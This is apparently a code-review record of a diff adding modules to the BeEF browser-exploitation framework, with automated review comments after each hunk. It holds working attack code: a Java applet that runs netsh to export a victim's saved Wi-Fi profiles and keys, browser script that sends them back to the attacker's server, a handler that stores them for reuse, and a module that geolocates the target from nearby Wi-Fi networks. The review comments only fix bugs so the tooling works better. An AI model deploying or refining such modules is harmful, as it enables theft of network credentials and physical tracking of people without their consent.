line = line.replaceAll("^\\s+", "");
Pattern p1 = Pattern.compile("((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(1);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
bssidList.add(m1.group(2));
signal = m1.group(3);
signal = signal.replaceAll(" ","");
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
result="\nI don't know where the target is";
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static boolean isWindows() {
String os = System.getProperty("os.name").toLowerCase();
// windows
return (os.indexOf("win") >= 0);
}
public static boolean isMac() {
String os = System.getProperty("os.name").toLowerCase();
// Mac
return (os.indexOf("mac") >= 0);
}
public static boolean isLinux() {
String os = System.getProperty("os.name").toLowerCase();
// linux or unix
return (os.indexOf("nix") >= 0 || os.indexOf("nux") >= 0);
}
}
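Review bot: `getMac()` reads the wrong capture groups: in `((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)` group 2 is the inner `(.?)` of the SSID and group 3 is the BSSID, so `bssidList.add(m1.group(2))` stores at most one character and `signal = m1.group(3)` stores the MAC; the RSSI is group 6. Use non-capturing `(?:.?)*` groups so the indices are stable. In `getWindows()` the SSID pattern `[\\w\\s]*` silently skips names containing any other character while the BSSID and Signal lines of the same network are still added, so the three lists drift out of step and `googleLookup` then pairs them by the shared index `j`; collect one record per network rather than three parallel lists. Hygiene: the `Pattern` objects are recompiled on every input line, the `BufferedReader` and `Process` are never closed or waited for, the collections are raw types, `isLinux()` is unused, and `System.out.println(e.getMessage())` inside an applet reaches nobody; either put the error text into `result` or drop the catch.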

@@ -0,0 +1,49 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'rubygems'
require 'json'
require 'open-uri'
class Get_physical_location < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
end
def post_execute
results = @datastore['results'].to_s
results = results.gsub("location_info=","")
response = open(results).read
result = JSON.parse(response)
reverseGoogleUrl = "https://maps.googleapis.com/maps/geo?q="+result['location']['lat'].to_s+','+result['location']['lng'].to_s+"&output=json&sensor=true_or_false"
googleResults = open(reverseGoogleUrl).read
jsonGoogleResults = JSON.parse(googleResults)
addressFound = jsonGoogleResults['Placemark'][0]['address']
writeToResults = Hash.new
writeToResults['data'] = addressFound
BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getGPSLocation.jar')
content = {}
content['Result'] = addressFound
save content
end
end
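Review bot: `open(results)` hands a string taken verbatim from the hooked browser's `location_info=` parameter to Kernel#open/open-uri; parse it with `URI.parse` and require an `https` URL on `maps.googleapis.com` before fetching, so a malformed or hostile response from the hooked browser cannot make the BeEF server open arbitrary strings (the applet's own failure text `I don't know where the target is` already arrives through this path and makes `open` raise). The chain `JSON.parse` -> `result['location']['lat']` -> second `open` -> `['Placemark'][0]['address']` has no nil or exception handling, so any failure aborts `post_execute` before `unbind` runs. `sensor=true_or_false` in `reverseGoogleUrl` is the placeholder from the Google documentation and should be `true` or `false`. The result is also saved twice (`save_result` and `save content`); keep one.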

@@ -22,5 +22,8 @@ beef:
description: "This module will retrieve basic information about the host system using an unsigned Java Applet. <br/><br/>The details will include:<br/> <ul><li> - Operating system details</li><li> - Java VM details</li><li> - NIC names and IP</li><li> - Number of processors</li><li> - Amount of memory</li><li> - Screen display modes</li></ul>"
authors: ["bcoles", "antisnatchor"]
target:
not_working:
ALL:
os: ["iPhone", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]
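Review bot: the new `not_working` block excludes `Macintosh` for all browsers without saying why; add a YAML comment with the reason so the exclusion can be revisited later. Also confirm in the file itself that `not_working`, `working` and `user_notify` sit at the same indentation level under `target`; the extracted hunk shows no indentation, so the nesting cannot be checked here.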

@@ -0,0 +1,30 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
if (output) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output);
}
beef.dom.detachApplet('wirelessZeroConfig');
});
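Review bot: same two issues as the getGPSLocation script: `applet_name` is assigned and never used, and `detachApplet('wirelessZeroConfig')` is given the applet code name rather than the `applet_id` used for `attachApplet`. More important here, `output` is the concatenated XML of the exported profiles and is spliced into the request as `'result='+output` without `encodeURIComponent`; XML text contains `&`, `=` and `<`, so unless `beef.net.send` encodes the body itself the server will receive a truncated or split parameter. The parameter name `result` must also agree with the key the Ruby `post_execute` reads.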

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_wireless_keys:
enable: true
category: "Host"
name: "Get Wireless Keys"
description: "This module will retrieve the wireless profiles from the target computer.<br/><br/>You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command:<br/>netsh wlan add profile filename=\"exported_wlan_profiles.xml\".<br/><br/>After that, just launch and connect to the wireless network without any password prompt.<br/><br/>For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
user_notify: ["IE", "C", "S", "O", "FF"]
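Review bot: the `description` tells the operator to copy the results into `exported_wlan_profiles.xml` by hand, but the module's `post_execute` in this same diff already writes that file; the text should state where the file is written instead of repeating the manual step. `target` contains only `user_notify` and no `working` entry, unlike the other module configs here, and the applet only handles Windows `os.version` 6.0/6.1, so a `not_working` entry for the other operating systems would keep this config consistent with them.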

@@ -0,0 +1,35 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_wireless_keys < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar')
end
def post_execute
content = {}
content['result'] = @datastore['result'].to_s
save content
f = File.open("exported_wlan_profiles.xml","w+")
f.write((@datastore['results']).sub("result=",""))
writeToResults = Hash.new
writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine"
BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar')
end
end
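Review bot: `@datastore['result']` on one line and `@datastore['results']` two lines later cannot both be populated; the browser script sends `result=`, so `@datastore['results']` is nil and `.sub("result=","")` raises NoMethodError, which skips `save_result` and `unbind`. Use a single key. The `File.open("exported_wlan_profiles.xml","w+")` handle is never closed (write it with a block or `File.write`), the file lands in `Dir.pwd` under a fixed name, so every run and every hooked browser overwrites the previous export, and the content is written to disk without any check that it is well-formed XML; a per-session path under a dedicated data directory avoids the clobbering.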

@@ -0,0 +1,117 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class wirelessZeroConfig extends Applet{
public static String result = "";
public wirelessZeroConfig(){
super();
return;
}
public static String getInfo() {
return result;
}
public void init() {
if (isWindows()) {
String osVersion= System.getProperty("os.version");
if(osVersion.equals("6.0") || osVersion.equals("6.1")){
result=getWindows();
}
} else {
result = "OS is not supported";
}
}
public static String getWindows(){
String cmd1 = "netsh wlan show profiles";
String cmd2 = "netsh wlan export profile name=";
String keyword1 = "User profiles";
String wlanProfileArr[];
String wlanProfileName;
int match = 0;
int count = 0;
ArrayList<String> profileList = new ArrayList<String>();
try {
//Get wlan profile names
Process p1 = Runtime.getRuntime().exec(cmd1);
BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream()));
String line = null;
//Checks if string match "User profiles"
while ((line = in1.readLine()) != null) {
//Checks if string match "User profiles"
if(match==0){
if(line.toLowerCase().contains(keyword1.toLowerCase())){
match=1;
}
}
if(match==1){
if(count>1){
//If string matches the keyword "User Profiles"
line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", ""));
if(line.length()>0){
wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");;
profileList.add(wlanProfileName);
}
}
count+=1;
}
}
in1.close();
} catch (IOException e) { }
try{
String tmpDir = System.getProperty("java.io.tmpdir");
if ( !(tmpDir.endsWith("/") || tmpDir.endsWith("\\")) )
tmpDir = tmpDir + System.getProperty("file.separator");
//Export WLAN Profile to XML file
for(Iterator iterator = profileList.iterator(); iterator.hasNext();){
String profileName = iterator.next().toString();
Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"');
//Check if exported xml exists
File f = new File(tmpDir+"Wireless Network Connection-"+profileName+".xml");
if(f.exists()){
//Read contents of XML file into results variable
FileInputStream fstream = new FileInputStream(f);
DataInputStream in2 = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in2));
String xmlToStr;
while((xmlToStr = br.readLine()) != null){
result+=xmlToStr;
}
in2.close();
}
}
} catch (IOException e) {
}
return result;
}
public static boolean isWindows() {
String os = System.getProperty("os.name").toLowerCase();
return (os.indexOf("win") >= 0);
}
/**
public static void main(String[] args) {
if (isWindows()) {
String osVersion= System.getProperty("os.version");
System.out.println(osVersion);
if(osVersion.equals("6.0") || osVersion.equals("6.1")){
result=getWindows();
}
} else {
result = "OS is not supported";
}
System.out.println(result);
}
**/
}
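Review bot: `f.exists()` is evaluated immediately after `Runtime.getRuntime().exec(cmd2+'"'+profileName+'"')` with no `p2.waitFor()`, so the existence check races the `netsh` export and a profile is silently skipped whenever the file is not there yet; `p1` is likewise never awaited and its error stream is never drained. Both `catch (IOException e) { }` blocks swallow errors, leaving `result` empty with no indication why. Smaller points: the double semicolon on the `wlanProfileName = ...` line, the unnecessary `DataInputStream` wrapper around `FileInputStream`, `match` and `count` as ints where a boolean and a comment explaining the two skipped header lines would read better, and the commented-out `main` inside a `/** ... **/` Javadoc block, which should be deleted rather than kept as dead code. The profiles are also concatenated into `result` with no separator, so the receiver gets one run of XML documents.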

@@ -22,5 +22,8 @@ beef:
description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked). <br><br>Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree."
authors: ["saafan"]
target:
not_working:
ALL:
os: ["iPhone"]
working: ["All"]
user_notify: ["FF", "C"]
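Review bot: `working: ["All"]` mixes case with the `ALL` key used in `not_working` two lines above, and listing `FF` and `C` under `user_notify` while `working` already claims all browsers makes the two entries overlap; decide whether Firefox and Chrome belong under `working` or `user_notify` and keep the spelling of the all-browsers token consistent across configs.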

@@ -16,7 +16,7 @@
beef:
module:
insecure_url_skype:
enable: true
enable: false
category: "Host"
name: "Make Skype Call (Skype)"
description: "This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes<br><br>The protocol handler used will be: skype."
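Review bot: flipping `enable: true` to `enable: false` disables the module with no explanation in the file; add a YAML comment (or the reason in the commit) stating why it is turned off, otherwise the next maintainer cannot tell whether it is broken, deprecated or intentionally held back.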
